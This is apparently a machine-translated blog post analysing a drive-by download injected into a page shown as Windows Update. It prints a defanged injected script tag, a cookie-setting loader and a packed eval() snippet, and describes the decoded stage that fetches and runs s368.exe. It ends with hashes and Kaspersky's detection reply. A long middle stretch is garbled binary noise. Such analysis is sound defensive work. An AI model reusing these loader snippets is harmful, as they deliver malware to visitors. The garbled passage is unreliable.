Is the Windows Update Website hacked or hacked by the ARP virus? Virus. win32.autorun. AM
EndurerOriginal
1Version
When I turned on my computer this morning, I found that Windows Update was slow, so I opened http://www.windowsupdate.com/manually, but it was a pile of garbage ~
Select "Windows Update" from the Start menu and open http://windowsupdate.microsoft.com/. the display is the same as http://www.windowsupdate.com.
Check the IP address.
D:/PE/test> Ping www.windowsupdate.com
Pinging windowsupdate.microsoft.nsatc.net [207.46.225.221] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Ping statistics for 207.46.225.221:
Packets: Sent = 4, received = 0, lost = 4 (100% loss ),
Approximate round trip times in Milli-seconds:
Minimum = 0 ms, maximum = 0 ms, average = 0 ms
[Query results] Your query: [IP address] 207.46.225.221 => 207.46.225.221
· Main data on this site: Microsoft, Raymond, Washington, USA
· Auxiliary data on this site: no data has been submitted
· Reference Data 1: Microsoft USA
· Reference Data 2: USA
[Query] www.123cha.com
D:/PE/test> Ping windowsupdate.microsoft.com
Pinging windowsupdate.microsoft.nsatc.net [207.46.18.94] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Ping statistics for 207.46.18.94:
Packets: Sent = 4, received = 0, lost = 4 (100% loss ),
Approximate round trip times in Milli-seconds:
Minimum = 0 ms, maximum = 0 ms, average = 0 ms
[Query results] Your query: [IP address] 207.46.18.94 => 207.46.18.94
· Main data on this site: Microsoft, Raymond, Washington, USA
· Auxiliary data on this site: no data has been submitted
· Reference Data 1: Microsoft USA
· Reference Data 2: USA
The IP address is normal.
View the webpage Source Code as follows:
/---
<SCRIPT src = hxxp: // C *** K ** 1 *. In/n **. js> </SCRIPT> merge Mo ?? & Apos; snapshot} t used [when lo has been transferred? H W ま щ H, 6}/g? Q | y (? = {Symbol # rk suo Q drive n # MX) symbol 5 symbol FP symbol E?
? When there are too many R groups )??
? Why are there too many? Xu/= Z ^ + y C ^ Z ^ @ k? G Branch algorithm G.3? P [F? L? Mongoj mon
? K ^? Why Z V ?? DM
? Zc2iglg ^ B $ zookeeper DCS
Tianji baijw Marriott? H0; C don't g comment '? })? QG? Port w * bandwidth = 4 pockets? 0 bytes? 6 then V? Mai? Why? O> n? Why? Ha ready R ready? = Birds x birds '0 birds ~ Why? Success !? F done! PJ ^ [? @:? K branch 22 Dispatch n, cen h Branch (r Association Zhejiang
#? | Listen 8j?] 6 bytes running % N? V? Policyp? J? W <th! P? {Token ;? Jing 2 P length "% F ~ Teng ?) # €? Why S & minutes = Why? EI should t be | T should have been too many O should have been too many 'xw? + Ding Yi? Isn t ?,] P] '{h # {o :? Too many? What is auto scaling? Too many tasks? G? F'l lambs? When 6 then y * then *? 20174lr ?? G Baking> K? A branch P branch-branch m
?
Giggle? Uzt ^ Zn rjfv: J %7 %9 ?! Stuffy? Wannacase? H1? When when 1 then 2 then? & Y? M limit l limit !? Jane D (; Zhu 'Shen; € K )_?
Go into Objective C? Too many I/too 5 then too W? Pray. R? [? R [4 m Habitat D? V ?」 Qingting #1 Juan jiu jb? Required bytes} required 4O;
Ann; X ironed r He = K U cut? =? Shouu shouyu) Sang Ming H Yu t he #? @? Success | .? When a halogen D is r? "n? Why? # K shot ?, 7 F] rows/Z. _ rows ,? Too many's? ) When I did * When does it happen? N?
Why 9 then why @ s? F? L zookeeper ~? 8? Zookeeper (? Why? 66? T /? Shard = | shard? ^ ?? Z runtime BM] Does O. 0? K ▆ @ v ?? + 8 {
U? S (?
Why ?? |? Too many tasks? 4hd audio? SN spring CW [| ?? Why 7 then? I'm C :?? Blunt margin {P packet loss margin; proper margin R ['margin ?} Leopard e-oak t? U branch networks
9u too long?
H? HP frequency compaction encounters compaction <G? Why? 7n?
---/
D:/test> Ping C *** K ** 1 *. In
Pinging C *** K ** 1 *. In [209.11.243.35] with 32 bytes of data:
Reply from 209.11.243.35: bytes = 32 time = 479 Ms TTL = 116
Reply from 209.11.243.35: bytes = 32 time = 411 Ms TTL = 116
Reply from 209.11.243.35: bytes = 32 time = 375 Ms TTL = 116
Request timed out.
Ping statistics for 209.11.243.35:
Packets: Sent = 4, stored ED = 3, lost = 1 (25% loss ),
Approximate round trip times in Milli-seconds:
Minimum = 375 ms, maximum = 479 ms, average = 316 ms
Your query: [IP address] 209.11.243.35 => 209.11.243.35
· Main site data: USA
· Auxiliary data on this site: no data has been submitted
· Reference Data 1: USA
· Reference Data 2: USA
Hxxp: // C *** K ** 1 *. In/n **. jsSource code:
/---
Document. writeln ("<SCRIPT src =/" hxxp: /// C *** K ** 1 * // s368 // newjs *** 2.js/ "> <// SCRIPT> ");
Document. writeln ("<SCRIPT> ");
Document. writeln ("function start (){");
Document. writeln ("Var then = new date ()");
Document. writeln ("then. settime (then. gettime () + 24*60*60*1000 )");
Document. writeln ("Var cookiestring = new string (document. Cookie )");
Document. writeln ("Var cookieheader =/" cookie1 = /"");
Document. writeln ("Var beginposition = cookiestring. indexof (cookieheader )");
Document. writeln ("If (beginposition! =-1 ){");
Document. writeln ("} else ");
Document. writeln ("{document. Cookie =/" cookie1 = popw.s; expires =/"+ then. togmtstring ()");
Document. writeln ("");
Document. writeln ("}");
Document. writeln ("}");
Document. writeln ("START ();");
Document. writeln ("</SCRIPT> ")
---/
Hxxp: // C *** K ** 1 *. In/s368/newjs *** 2.jsIs to use eval () to execute the encryption code:
/---
Eval (function (P, A, C, K, E, D) {e = function (c) {return (C <? '': E (parseint (C/A) + (C = C % A)> 35? String. fromcharcode (C + 29): C. tostring (36)}; If (! ''. Replace (/^/, string) {While (c --) d [E (c)] = K [c] | E (C ); k = [function (e) {return d [e]}]; E = function () {return '// W +'}; C = 1 }; while (c --) if (K [c]) P = P. replace (New Regexp ('// B' + E (c) + '// B', 'G'), K [c]); return p} ('1a ("// I // G // E // H // J // 2... (Omitted )... | X2a | eval'. Split ('|'), 0 ,{}))
---/
The original code is obtained after three decryption. Microsoft. XMLHTTP and SCR using pting. FileSystemObject are used to download the s368.exe file and save it to % WINDIR %. The file name is defined by the UDF:
/---
Function gnms (N)
{
VaR numberms = math. Random () * N;
Return '~ Temp '+ math. Round (numberms) +'. tmp ';
---/
Generate, that is ~ Temp *****. EXE, where ***** is a number. Then run the command % WINDIR %/system32/cmd.exe/C % WINDIR %/~ through the ShellExecute method of the shell. Application Object Q /~ Run temp *****. EXE.
File description:D:/test/s368.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 8:39:29
Modification time: 8:39:29
Access time:
Size: 23087 bytes, 22.559 KB
MD5: a0795ad6df991d65b38968ced427f09b
Exestealth 2.0-2.4-> webtoolmaster
Subject: |
Re: s368.exe [KLAB-2419187] |
Sender: |
"" <Newvirus@kaspersky.com> |
Sent at: 13:58:48 |
S368.exey-Virus. win32.autorun. AM
New malicious software was found in this file. It's detection will be added in the next update. Thank you for your help.
Please quote all when answering.
--
Best regards, Boris Yampolsky
Virus analyst, Kaspersky Lab.
E-mail: newvirus@kaspersky.com
Http://www.kaspersky.com/
Http://www.kaspersky.com/virusscanner-free online virus testing.
Http://www.kaspersky.com/helpdesk.html-technical support.
I downloaded the check again and found that the MD5 value of the file has changed:
File description:D:/test/s368.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 19:43:49
Modification time: 19:43:50
Access time:
Size: 23087 bytes, 22.559 KB
MD5: e277b83f3eedac59ec0077bb981e4082